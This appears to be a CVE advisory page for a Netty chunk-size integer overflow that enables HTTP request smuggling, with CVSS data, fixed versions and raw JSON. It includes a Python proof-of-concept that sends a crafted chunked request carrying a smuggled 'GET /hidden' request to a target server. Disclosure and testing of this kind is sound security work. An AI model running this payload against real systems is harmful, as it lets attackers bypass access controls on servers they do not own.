Security Vulnerability Report
CVE-2026-42580 CVSS 6.5 MEDIUM

Published: 2026-05-13 19:17:23
Last Modified: 2026-05-14 19:16:36

Description

Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Netty < 4.2.13.Final
Netty < 4.1.133.Final

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket


def exploit_netty_smuggling(host, port):
    # PoC for CVE-2026-42580: Netty Chunk Size Overflow leading to Request Smuggling
    # This script sends a chunked request with a size that triggers an integer overflow.
    # The pieces are joined with explicit "+" so that the chunk body is exactly
    # ten "A" bytes, rather than repeating the whole header block ten times.
    payload = (
        "POST / HTTP/1.1\r\n"
        + f"Host: {host}\r\n"
        + "Connection: keep-alive\r\n"
        + "Transfer-Encoding: chunked\r\n"
        + "\r\n"
        + "80000000\r\n"  # Large value to cause int overflow in 32-bit signed int
        + "A" * 10 + "\r\n"
        + "0\r\n"
        + "\r\n"
        # Second request smuggled within the same connection
        + "GET /hidden HTTP/1.1\r\n"
        + f"Host: {host}\r\n"
        + "\r\n"
    )
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)  # do not block forever if the server never answers
        s.connect((host, port))
        s.sendall(payload.encode())
        print(f"Payload sent to {host}:{port}")
        # Receive response to verify behavior
        response = s.recv(4096)
        print("Response:")
        print(response.decode(errors="replace"))
        s.close()
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    # Replace with actual target details
    exploit_netty_smuggling("127.0.0.1", 8080)
```

References

https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723 (GitHub Security Advisory GHSA-m4cv-j2px-7723)

Weaknesses: CWE-190 (Integer Overflow or Wraparound), CWE-444 (HTTP Request/Response Smuggling)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42580", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:23.490", "lastModified": "2026-05-14T19:16:35.967", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-444"}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723", "source": "[email protected]"}, {"url": "https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}